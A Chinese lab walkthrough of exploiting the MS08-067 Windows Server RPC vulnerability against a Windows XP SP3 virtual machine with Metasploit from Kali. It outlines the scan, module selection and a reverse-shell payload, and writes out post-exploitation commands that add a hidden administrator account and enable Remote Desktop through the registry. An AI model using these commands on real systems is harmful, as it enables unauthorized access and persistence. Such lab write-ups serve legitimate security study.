#windowsxpsp3系统MS08-067漏洞测试

简介: #windowsxpsp3系统MS08-067漏洞测试

#windowsxpsp3系统MS08-067漏洞测试

漏洞描述

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求,则该漏洞可能允许远程执行代码,在Windows 2000、Windows server 2003系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

Windows 2000、WindowsXP、Windows server 2003、Windows Vista、Windows server 2008、Windows7 beta。

实验环境(虚拟机搭建)

目标主机:winxpsp3英文版:192.168.28.133

攻击主机:kaililinux:192.168.28.134

攻击过程

先用nmap扫描内部192.168.28.0/24位的网段查看是否有xp系统的主机存活

进入metasploit框架

Msfconsole

搜索漏洞

Search ms08-067选择一个攻击模块

查看配置信息并设置

设置要攻击的目标主机ip

设置自己的ip地址,用于目标机器反弹shell

设置payload 用于反弹shell,这里是windows的

开始攻击

Expolit/run

一些命令

后渗透利用

Getuid

Shell

net user ouyang 123456 /add

net localgroup administrators ouyang /add

创建用户完毕后,打开3389远程桌面连接端口

echo reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

查看机器是否打开了3389

远程桌面连接

链接成功

获取完信息之后删除用户

相关文章
|
29天前
|
设计模式 安全 测试技术
【软件设计师备考 专题 】系统实施:程序设计和系统测试
【软件设计师备考 专题 】系统实施:程序设计和系统测试
64 0
|
2月前
|
SQL 安全 关系型数据库
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞,品相还不错,可执行任意 SQL 语句。 总之,吃了一惊,一个防 SQL 注入的工具居然也有 SQL 注入漏洞。 请看这段代码
414 1
|
3天前
|
消息中间件 网络协议 物联网
如何入门做物联网系统压测?
【4月更文挑战第18天】物联网系统在架构、网络模式、通信协议等方面与传统的互联网系统有所区别。因此,传统的性能测试方法不能直接套用到物联网系统中。
56 13
如何入门做物联网系统压测?
|
4月前
|
Ubuntu 测试技术 Linux
软件测试/测试开发|Ubuntu系统常用文件管理命令详解
软件测试/测试开发|Ubuntu系统常用文件管理命令详解
27 1
|
1月前
|
Java 测试技术 数据库
springboot大学生体质测试管理系统
springboot大学生体质测试管理系统
|
3月前
|
前端开发 JavaScript API
React 生态系统:路由、状态管理、调试、测试、组件库、文档……
React 生态系统:路由、状态管理、调试、测试、组件库、文档……
41 0
|
3月前
|
监控 Java 测试技术
基于springboot实现的个人性格测试系统(分前后端)
基于springboot实现的个人性格测试系统(分前后端)
|
4月前
|
Ubuntu 测试技术 Linux
软件测试/测试开发|Ubuntu系统入门教程
软件测试/测试开发|Ubuntu系统入门教程
41 0
|
14天前
|
测试技术 C语言
网站压力测试工具Siege图文详解
网站压力测试工具Siege图文详解
21 0
|
1月前
|
JavaScript jenkins 测试技术
这10款性能测试工具,收藏起来,测试人的工具箱!
这10款性能测试工具,收藏起来,测试人的工具箱!